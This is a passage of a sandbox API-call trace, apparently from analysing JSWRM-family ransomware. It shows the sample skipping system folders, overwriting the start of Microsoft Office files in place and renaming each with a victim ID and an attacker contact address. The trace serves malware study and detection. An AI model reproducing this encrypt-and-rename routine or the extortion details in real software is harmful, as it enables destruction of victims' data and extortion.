lpWideCharStr="TellMeOutlookTask.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookTask.nrr", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookTask.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookTask.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0121.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookTask.nrr", cchWideChar=21, lpMultiByteStr=0x2412e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlookTask.nrr", lpUsedDefaultChar=0x0) returned 21 [0121.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0121.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0121.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0121.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookTask.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlooktask.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.779] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=253280) returned 1 [0121.779] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.779] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.894] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.894] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.894] CloseHandle (hObject=0x238) returned 1 [0121.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0121.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0121.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0121.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0121.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0121.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0121.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.895] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookTask.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlooktask.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlookTask.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlooktask.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.897] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaee2894, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaee2894, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4bb4c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMePowerPoint.nrr", cAlternateFileName="TEAA78~1.NRR")) returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2=".") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="..") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="...") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="windows") returned -1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="recovery") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="perflogs") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="documents and settings") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="system volume information") returned 1 [0121.897] lstrcmpiW (lpString1="TellMePowerPoint.nrr", lpString2="msocache") returned 1 [0121.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMePowerPoint.nrr", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMePowerPoint.nrr", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMePowerPoint.nrr", lpUsedDefaultChar=0x0) returned 20 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMePowerPoint.nrr", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMePowerPoint.nrr", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMePowerPoint.nrr", lpUsedDefaultChar=0x0) returned 20 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0121.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0121.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMePowerPoint.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmepowerpoint.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.898] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=310092) returned 1 [0121.898] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.898] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.909] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.909] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.910] CloseHandle (hObject=0x238) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0121.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0121.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0121.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0121.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0121.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.910] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMePowerPoint.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmepowerpoint.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMePowerPoint.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmepowerpoint.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.912] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b8ee092, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b8ee092, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b8ee092, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x4894c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeProject.nrr", cAlternateFileName="TE4F27~1.NRR")) returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2=".") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="..") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="...") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="windows") returned -1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="recovery") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="perflogs") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="documents and settings") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="system volume information") returned 1 [0121.912] lstrcmpiW (lpString1="TellMeProject.nrr", lpString2="msocache") returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeProject.nrr", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeProject.nrr", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeProject.nrr", lpUsedDefaultChar=0x0) returned 17 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeProject.nrr", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0121.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeProject.nrr", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeProject.nrr", lpUsedDefaultChar=0x0) returned 17 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0121.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0121.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0121.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeProject.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeproject.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.913] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=297292) returned 1 [0121.913] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.913] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.974] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.974] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.975] CloseHandle (hObject=0x238) returned 1 [0121.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0121.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0121.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0121.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0121.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0121.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0121.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.975] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeProject.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeproject.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeProject.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeproject.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0121.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0121.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0121.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0121.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.977] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x47bd0fa, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x47bd0fa, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x47bd0fa, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x34adc, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeVisio.nrr", cAlternateFileName="TE7B47~1.NRR")) returned 1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2=".") returned 1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="..") returned 1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="...") returned 1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="windows") returned -1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="recovery") returned 1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="perflogs") returned 1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="documents and settings") returned 1 [0121.977] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.978] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="system volume information") returned 1 [0121.978] lstrcmpiW (lpString1="TellMeVisio.nrr", lpString2="msocache") returned 1 [0121.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0121.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeVisio.nrr", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeVisio.nrr", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeVisio.nrr", lpUsedDefaultChar=0x0) returned 15 [0121.978] HeapFree (in: 